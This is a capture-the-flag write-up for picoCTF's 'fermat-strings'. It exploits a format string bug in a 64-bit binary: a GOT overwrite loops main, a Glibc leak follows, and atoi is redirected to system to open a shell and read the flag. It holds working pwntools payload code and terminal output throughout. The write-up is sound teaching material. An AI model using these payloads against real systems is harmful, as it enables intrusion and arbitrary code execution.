fermat-strings

12 minutes to read

We are given a 64-bit binary called chall:

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

Static code analysis

We also have the C source code. Basically, what the program does is request two numbers and try to find one that breaks Fermat’s Last Theorem.

As a reminder, Fermat’s Last Theorem claims that there are no positive integers , , , that satisfy the equation:

For .

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <math.h>

#define SIZE 0x100

void main(void) {
  char A[SIZE];
  char B[SIZE];

  int a = 0;
  int b = 0;

  puts("Welcome to Fermat\\'s Last Theorem as a service");

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  printf("A: ");
  read(0, A, SIZE);
  printf("B: ");
  read(0, B, SIZE);

  A[strcspn(A, "\n")] = 0;
  B[strcspn(B, "\n")] = 0;

  a = atoi(A);
  b = atoi(B);

  if (a == 0 || b == 0) {
    puts("Error: could not parse numbers!");
    return 1;
  }

  char buffer[SIZE];
  snprintf(buffer, SIZE, "Calculating for A: %s and B: %s\n", A, B);
  printf(buffer);

  int answer = -1;
  for (int i = 0; i < 100; i++) {
    if (pow(a, 3) + pow(b, 3) == pow(i, 3)) {
      answer = i;
    }
  }

  if (answer != -1) printf("Found the answer: %d\n", answer);
}

Format String vulnerability

On the source code we can see a Format String vulnerability:

snprintf(buffer, SIZE, "Calculating for A: %s and B: %s\n", A, B);
printf(buffer);

Because we can add format strings into buffer which is the first argument of printf. However, we need to enter a valid number in A and B:

printf("A: ");
read(0, A, SIZE);
printf("B: ");
read(0, B, SIZE);

A[strcspn(A, "\n")] = 0;
B[strcspn(B, "\n")] = 0;

a = atoi(A);
b = atoi(B);

But this is easy. Let’s try:

$ ./chall
Welcome to Fermat\'s Last Theorem as a service
A: 1.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
B: 1
Calculating for A: 1.400bd8.97161728.0.ffffffff.97161350.0.0.97161580.1.78252e31.252e7825.2e78252e.78252e78.252e7825 and B: 1

As we can see, we can dump values from the stack. And also, the value of the format string starts at position 10 (offset 10):

$ ./chall
Welcome to Fermat\'s Last Theorem as a service
A: 1AAA%10$x
B: 1
Calculating for A: 1AAA41414131 and B: 1

Format String exploitation

The program will exit after we enter our input. We need to find a way of running again the program without stopping the process. This can be done using a the Format String vulnerability, because there is a format %n that allows to write the number of bytes written until %n into the address given as a parameter (the value of a position in the stack).

We notice that the binary has Partial RELRO, which means that the GOT is not writable during a Buffer Overflow exploitation, but it is writable via Format String. Hence, the idea is to change the value of an function in the GOT to point to main and be able to rerun the program as a result.

$ gdb -q chall
Reading symbols from chall...
(No debugging symbols found in chall)
gef➤  break main
Breakpoint 1 at 0x40083b
gef➤  run
Starting program: ./chall

Breakpoint 1, 0x000000000040083b in main ()

Now we show the GOT entries:

gef➤  got

GOT protection: Partial RelRO | GOT functions: 9

[0x601018] puts@GLIBC_2.2.5  →  0x4006c6
[0x601020] __stack_chk_fail@GLIBC_2.4  →  0x4006d6
[0x601028] setbuf@GLIBC_2.2.5  →  0x4006e6
[0x601030] printf@GLIBC_2.2.5  →  0x4006f6
[0x601038] snprintf@GLIBC_2.2.5  →  0x400706
[0x601040] pow@GLIBC_2.2.5  →  0x400716
[0x601048] strcspn@GLIBC_2.2.5  →  0x400726
[0x601050] read@GLIBC_2.2.5  →  0x400736
[0x601058] atoi@GLIBC_2.2.5  →  0x400746

From the point where we have the printf vulnerability, only pow and printf are called. We are not interested in changing printf, so let’s modify the entry for pow.

First, we are going to put the address in a position of the stack. Let’s use the input A for entering the address and the input B to extract it. But before, let’s do it with recognizable characters:

$ ./chall
Welcome to Fermat\'s Last Theorem as a service
A: 1234567.AAAABBBB
B: 1.%11$lx
Calculating for A: 1234567.AAAABBBB and B: 1.4242424241414141

Notice the use of %lx to print an 8-byte value, and the position 11 because in position 10 we have 1234567..

Now, we can replace AAAABBBB with the address of pow at GOT. And instead of putting %11$lx, we will put %11$n. Let’s do it in a Python script with pwntools and attach GDB to visualize the GOT entries:

payload_a = b'1234567.' + p64(pow_got)
payload_b = b'1.%11$n'

gdb.attach(p, gdbscript='break pow\ncontinue\ngot')

p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)

p.interactive()

If we run it, GDB will attach to it, break at pow and then show the GOT:

gef➤  got

GOT protection: Partial RelRO | GOT functions: 9

[0x601018] puts@GLIBC_2.2.5  →  0x7f4c7b0845a0
[0x601020] __stack_chk_fail@GLIBC_2.4  →  0x4006d6
[0x601028] setbuf@GLIBC_2.2.5  →  0x7f4c7b08bc50
[0x601030] printf@GLIBC_2.2.5  →  0x7f4c7b061e10
[0x601038] snprintf@GLIBC_2.2.5  →  0x7f4c7b061ee0
[0x601040] pow@GLIBC_2.2.5  →  0x28
[0x601048] strcspn@GLIBC_2.2.5  →  0x7f4c7b1837b0
[0x601050] read@GLIBC_2.2.5  →  0x7f4c7b10e130
[0x601058] atoi@GLIBC_2.2.5  →  0x7f4c7b044730

Manual exploitation

The entry for pow has changed to 0x28 (40). This means that until the %11$n, we have printed 40 bytes. Since we have only 1. before %11$n, this means that there are 38 bytes in the stack before. If we put 1.., then the GOT entry would change to 0x29, and so on.

At this moment, we need to enter the address of main (0x400837, which is 4196407 in decimal) in the GOT entry. However, we cannot introduce this number of bytes because it is too large.

But we can make use of another format string. Since the address we need to be written is 4196407, then we must print 4196407 - 38 - 2 = 4196367 bytes. And this can be done with a format string like %4196367c:

pow_got = 0x601040
payload_a = b'1234567.' + p64(pow_got)
payload_b = b'1.%4196367c' + b'%11$n'

p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)

p.interactive()

The computation of the number of bytes to write can be done as follows:

pow_got = 0x601040
bytes_on_stack = 38
bytes_to_print = main_addr - bytes_on_stack - 2

payload_a = b'1234567.' + p64(pow_got)
payload_b = f'1.%{bytes_to_print}c'.encode() + b'%11$n'

And it works, we have converted pow into main:

$ python3 solve.py
[+] Starting local process './chall': pid 389440
[*] Switching to interactive mode
Welcome to Fermat\'s Last Theorem as a service
A: $ 1
B: $ 1
Calculating for A: 1 and B: 1
Welcome to Fermat\'s Last Theorem as a service
A: $ 1
B: $ 1
Calculating for A: 1 and B: 1
Welcome to Fermat\'s Last Theorem as a service
A: $

Now we have more chances to continue with the exploitation. Next, we must leak an address of Glibc to obtain its version. The purpose of this is calculate the real address of system and overwrite the GOT again for the final stage.

Obtaining memory leaks

To leak an address we can use the Format String vulnerability. For that, we must call printf with a %s format (strings in C are given as pointers) and pass a GOT entry (for example, puts), so that the value inside the GOT entry is printed (it works like a pointer).

The strategy is similar: we will use the A input to store the address of the GOT entry for puts. And then we will put %11$s in the B input:

puts_got = 0x601018
payload_a = b'1234567.' + p64(puts_got)
payload_b = b'1.%11$s'

p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.recvuntil(b'B: 1.')

puts_addr = u64(p.recvline().strip().ljust(8, b'\0'))
log.success(f'Leaked puts() address: {hex(puts_addr)}')

After that, we can compute the base address of Glibc, knowing the offset of puts:

$ ldd chall
        linux-vdso.so.1 (0x00007ffda1df7000)
        libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f576d29c000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f576d0aa000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f576d3fe000)

$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
   194: 00000000000875a0   476 FUNC    GLOBAL DEFAULT   16 _IO_puts@@GLIBC_2.2.5
   429: 00000000000875a0   476 FUNC    WEAK   DEFAULT   16 puts@@GLIBC_2.2.5
   504: 00000000001273c0  1268 FUNC    GLOBAL DEFAULT   16 putspent@@GLIBC_2.2.5
   690: 0000000000129090   728 FUNC    GLOBAL DEFAULT   16 putsgent@@GLIBC_2.10
  1158: 0000000000085e60   384 FUNC    WEAK   DEFAULT   16 fputs@@GLIBC_2.2.5
  1705: 0000000000085e60   384 FUNC    GLOBAL DEFAULT   16 _IO_fputs@@GLIBC_2.2.5
  2342: 00000000000914a0   159 FUNC    WEAK   DEFAULT   16 fputs_unlocked@@GLIBC_2.2.5

puts_offset = 0x875a0
glibc_base_addr = puts_addr - puts_offset
log.success(f'Glibc base address: {hex(glibc_base_addr)}')

And with all these, we have leaked the address of puts and the base address of Glibc:

$ python3 solve.py
[+] Starting local process './chall': pid 414163
[+] Leaked puts() address: 0x7f4a695695a0
[+] Glibc base address: 0x7f4a694e2000
[*] Switching to interactive mode
Welcome to Fermat\'s Last Theorem as a service
A: $

Now we can search for the offset of system inside Glibc using:

$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
0000000000156a80   103 FUNC    GLOBAL DEFAULT   16 svcerr_systemerr@@GLIBC_2.2.5
0000000000055410    45 FUNC    GLOBAL DEFAULT   16 __libc_system@@GLIBC_PRIVATE
0000000000055410    45 FUNC    WEAK   DEFAULT   16 system@@GLIBC_2.2.5

The idea is to modify the GOT entry of a function that takes a controlled string as first argument so that it points to system. For example, some candidates are atoi and strcspn. This time, we will be using atoi, whose GOT entry address is 0x601058.

atoi_got = 0x601058

system_offset = 0x55410
system_addr = glibc_base_addr + system_offset

GOT overwrite

Now we must write the real address of system to the GOT entry of atoi. Let’s enter 0 bytes and see the value in the GOT using GDB as before:

payload_a = b'1234567.' + p64(pow_got)
payload_b = b'1.%11$n'

gdb.attach(p, gdbscript='break atoi\ncontinue\ngot')

p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)

p.interactive()

If we run it, GDB will attach to it, break at atoi and then show the GOT:

gef➤  got

GOT protection: Partial RelRO | GOT functions: 9

[0x601018] puts@GLIBC_2.2.5  →  0x7f660b8465a0
[0x601020] __stack_chk_fail@GLIBC_2.4  →  0x4006d6
[0x601028] setbuf@GLIBC_2.2.5  →  0x7f660b84dc50
[0x601030] printf@GLIBC_2.2.5  →  0x7f660b823e10
[0x601038] snprintf@GLIBC_2.2.5  →  0x7f660b823ee0
[0x601040] pow@GLIBC_2.2.5  →  0x400837
[0x601048] strcspn@GLIBC_2.2.5  →  0x7f660b9457b0
[0x601050] read@GLIBC_2.2.5  →  0x7f660b8d0130
[0x601058] atoi@GLIBC_2.2.5  →  0x7f6600000028

As it is shown, the entry for atoi has a value of 0x7f6600000028. With %11$n we have overwritten the last 4 bytes (namely, 0x00000028). Using the same procedure as before, we need to write a lot of bytes. The number of bytes to be entered in the format string can be computed as:

bytes_on_stack = 38
bytes_to_print = (system_addr - bytes_on_stack - 2) & 0xffffffff

We limit the number to 4 bytes just in case. And then we add it to the payload and send it:

bytes_to_print = (system_addr - bytes_on_stack - 2) & 0xffffffff

payload_a = b'1234567.' + p64(atoi_got) + p64(atoi_got + 2)
payload_b = f'1.%{bytes_to_print}c'.encode() + b'%11$n'

p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.recvline()

p.interactive()

If everything is correct, the GOT entry for atoi will be pointing to system. An thus, we can enter /bin/sh in A or B inputs to get a shell:

$ python3 solve.py
[+] Starting local process './chall': pid 502833
[+] Leaked puts() address: 0x7f4a096565a0
[+] Glibc base address: 0x7f4a095cf000
[*] Switching to interactive mode
Welcome to Fermat\'s Last Theorem as a service
A: $ /bin/sh
B: $
$ ls
chall  chall.c    Dockerfile  solve.py

Alright. Let’s tweak the exploit a little bit to spawn a shell automatically:

p.sendlineafter(b'A: ', b'/bin/sh')
p.sendlineafter(b'B: ', b'')

p.recvuntil(b'B: ')
p.sendline()

p.interactive()

$ python3 solve.py
[+] Starting local process './chall': pid 507100
[+] Leaked puts() address: 0x7f6218d5b5a0
[+] Glibc base address: 0x7f6218cd4000
[*] Switching to interactive mode
$ ls
chall  chall.c    Dockerfile  solve.py

Finding the remote Glibc version

However, we are not done yet. We must execute the exploit on the remote instance and get the version of Glibc. After that, we must update all the offsets.

To help with the version lookup, we can leak more function addresses of Glibc. For that, I decided to build a function called leak_address as follows:

def leak_address(got_entry: int) -> int:
    payload_a = b'1234567.' + p64(got_entry)
    payload_b = b'1.%11$s'

    p.sendlineafter(b'A: ', payload_a)
    p.sendlineafter(b'B: ', payload_b)
    p.recvuntil(b'B: 1.')

    return u64(p.recvline().strip().ljust(8, b'\0'))

So that it is used this way:

atoi_got = 0x601058
atoi_addr = leak_address(atoi_got)
log.success(f'Leaked atoi() address: {hex(atoi_addr)}')

puts_got = 0x601018
puts_addr = leak_address(puts_got)
log.success(f'Leaked puts() address: {hex(puts_addr)}')

We run the exploit remotely and it does not work. No problem for the moment. Let’s check the leaked addresses:

$ python3 solve.py mars.picoctf.net 31929
[+] Opening connection to mars.picoctf.net on port 31929: Done
[+] Leaked atoi() address: 0x7f026a26c730
[+] Leaked puts() address: 0x7f026a2ac5a0
[+] Glibc base address: 0x7f026a225000

These are the Glibc versions found (their offsets are all the same):

Glibc Version

We notice that the version of Glibc in the remote instance is the same that we were using locally.

However, the last stage of the exploit is not working remotely. This might be happening because we are writing a large amount of bytes in order to use %n. A more elegant way is using %hhn to write a single byte or %hn to write 2 bytes.

Fixing the exploit

Let’s modify our payload to have a more stable exploit. For the moment we will be using %hn. The last 2 bytes of the GOT entry can be overwritten in a similar way as before, just a few modifications:

bytes_to_print = ((system_addr & 0xffff) - bytes_on_stack - 2) % 0xffff

payload_a = b'1234567.' + p64(atoi_got) + p64(atoi_got + 2)
payload_b = f'1.%{bytes_to_print}c'.encode() + b'%11$hn'

payload_b += f'%12$hn'.encode()

gdb.attach(p, gdbscript='break atoi\ncontinue\ncontinue\ncontinue\ngot')

p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.recvline()

p.interactive()

The first thing to notice is the use of the AND operators to get the last 2 bytes of the address of system. And then the modulo operator to wrap around 0xffff if the operation was negative. After that we use %11$hn.

To overwrite the next 2 bytes, we need to put the address of the GOT entry for atoi but plus 2 (because we want to write in the next 2 bytes). And hence, we must use %12$hn. For now, let’s leave the second part blank (only %12$hn).

We attach GDB to the process and show the GOT entries:

gef➤  got

GOT protection: Partial RelRO | GOT functions: 9

[0x601018] puts@GLIBC_2.2.5  →  0x7f70473075a0
[0x601020] __stack_chk_fail@GLIBC_2.4  →  0x4006d6
[0x601028] setbuf@GLIBC_2.2.5  →  0x7f704730ec50
[0x601030] printf@GLIBC_2.2.5  →  0x7f70472e4e10
[0x601038] snprintf@GLIBC_2.2.5  →  0x7f70472e4ee0
[0x601040] pow@GLIBC_2.2.5  →  0x400837
[0x601048] strcspn@GLIBC_2.2.5  →  0x7f70474067b0
[0x601050] read@GLIBC_2.2.5  →  0x7f7047391130
[0x601058] atoi@GLIBC_2.2.5  →  0x7f7054105410

Notice how the last 2 bytes were overwritten correctly (at least the last 3 hexadecimal digits match with 410, which is the offset of system). And also, we must take into account that the next 2 bytes have the same value as the last 2 bytes (5410).

Knowing this, we can compute the number of bytes to write in order to place the correct number in that position:

bytes_to_print = ((system_addr & 0xffff) - bytes_on_stack - 2) % 0xffff

payload_a = b'1234567.' + p64(atoi_got) + p64(atoi_got + 2)
payload_b = f'1.%{bytes_to_print}c'.encode() + b'%11$hn'

bytes_to_print = (((system_addr >> 16) - system_addr) & 0xffff) % 0xffff

payload_b += f'%{bytes_to_print}c'.encode() + b'%12$hn'

p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.recvline()

p.interactive()

And everything works smoothly locally:

$ python3 solve.py
[+] Starting local process './chall': pid 547640
[+] Leaked atoi() address: 0x7f05651e4730
[+] Leaked puts() address: 0x7f05652245a0
[+] Glibc base address: 0x7f056519d000
[*] Switching to interactive mode
$ ls
chall  chall.c    Dockerfile  solve.py

Flag

Let’s see if it works remotely:

$ python3 solve.py mars.picoctf.net 31929
[+] Opening connection to mars.picoctf.net on port 31929: Done
[+] Leaked atoi() address: 0x7fc3974da730
[+] Leaked puts() address: 0x7fc39751a5a0
[+] Glibc base address: 0x7fc397493000
[*] Switching to interactive mode
$ ls
flag.txt
run
$ cat flag.txt
picoCTF{f3rm4t_pwn1ng_s1nc3_th3_17th_c3ntury}

The full exploit script can be found in here: solve.py.